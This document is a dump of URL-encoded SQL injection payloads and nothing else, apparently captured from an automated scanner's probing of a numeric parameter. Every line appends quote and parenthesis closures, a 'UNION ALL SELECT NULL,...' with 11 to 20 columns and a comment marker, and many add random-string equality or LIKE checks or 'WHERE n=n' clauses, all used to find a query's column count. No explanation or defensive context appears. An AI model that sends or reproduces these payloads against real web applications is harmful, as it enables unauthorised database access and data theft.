1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22rzgR%22%3D%22rzgR 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Ahjz%22%3D%22Ahjz 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22EMTG%22%3D%22EMTG 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22RxYG%22%3D%22RxYG 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22xbxl%22%3D%22xbxl 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22FEiJ%22%3D%22FEiJ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22IwHP%22%3D%22IwHP 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22CXiV%22%3D%22CXiV 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22bJOZ%22%3D%22bJOZ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22vCLq%22%3D%22vCLq 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22eiew%22%3D%22eiew 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22NTIW%22%3D%22NTIW 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22SzKD%22%3D%22SzKD 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22hTuK%22%3D%22hTuK 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22xYGr%22%3D%22xYGr 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22pVTL%22%3D%22pVTL 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22oMXy%22%3D%22oMXy 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22kyMn%22%3D%22kyMn 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22VvpI%22%3D%22VvpI 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ttaS%22%3D%22ttaS 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22pOjY%22%3D%22pOjY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22btbK%22%3D%22btbK 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22oxTs%22%3D%22oxTs 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22OnPz%22%3D%22OnPz 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Fvbe%22%3D%22Fvbe 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ufZF%22%3D%22ufZF 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22fagn%22%3D%22fagn 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22pbOr%22%3D%22pbOr 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22GjSU%22%3D%22GjSU 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22hEwL%22%3D%22hEwL 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Nobn%22%3D%22Nobn 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22cOYw%22%20LIKE%20%22cOYw 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22wEch%22%20LIKE%20%22wEch 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22uqYe%22%20LIKE%20%22uqYe 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22jhgb%22%20LIKE%20%22jhgb 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22OiCP%22%20LIKE%20%22OiCP 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22BSTJ%22%20LIKE%20%22BSTJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22fxcB%22%20LIKE%20%22fxcB 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22LLxI%22%20LIKE%20%22LLxI 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22PPvy%22%20LIKE%20%22PPvy 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22qHIF%22%20LIKE%20%22qHIF 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22yMOy%22%20LIKE%20%22yMOy 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22XrlN%22%20LIKE%20%22XrlN 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22diJO%22%20LIKE%20%22diJO 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ooyO%22%20LIKE%20%22ooyO 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22xxjP%22%20LIKE%20%22xxjP 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22YsAe%22%20LIKE%20%22YsAe 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ELMI%22%20LIKE%20%22ELMI 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22qUYn%22%20LIKE%20%22qUYn 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22wkqS%22%20LIKE%20%22wkqS 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22LiXC%22%20LIKE%20%22LiXC 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22rubt%22%20LIKE%20%22rubt 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22kVXU%22%20LIKE%20%22kVXU 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22XfYr%22%20LIKE%20%22XfYr 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22xlOq%22%20LIKE%20%22xlOq 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22eFHU%22%20LIKE%20%22eFHU 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22YXkm%22%20LIKE%20%22YXkm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22MEgV%22%20LIKE%20%22MEgV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ZmFl%22%20LIKE%20%22ZmFl 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22hzTA%22%20LIKE%20%22hzTA 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22jYuc%22%20LIKE%20%22jYuc 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22NFsh%22%20LIKE%20%22NFsh 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22IiHP%22%20LIKE%20%22IiHP 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22wzbn%22%20LIKE%20%22wzbn 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Aexh%22%20LIKE%20%22Aexh 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22qTgD%22%20LIKE%20%22qTgD 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22EOwz%22%20LIKE%20%22EOwz 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22wOMQ%22%20LIKE%20%22wOMQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22YHFv%22%20LIKE%20%22YHFv 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22fikp%22%20LIKE%20%22fikp 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22nwvO%22%20LIKE%20%22nwvO 1234.5%29%20WHERE%203252%3D3252%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%205052%3D5052%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%208113%3D8113%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%202498%3D2498%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%206810%3D6810%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%209912%3D9912%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%209608%3D9608%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%202440%3D2440%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%206213%3D6213%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%204391%3D4391%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%207088%3D7088%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%205554%3D5554%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%206630%3D6630%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%203767%3D3767%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 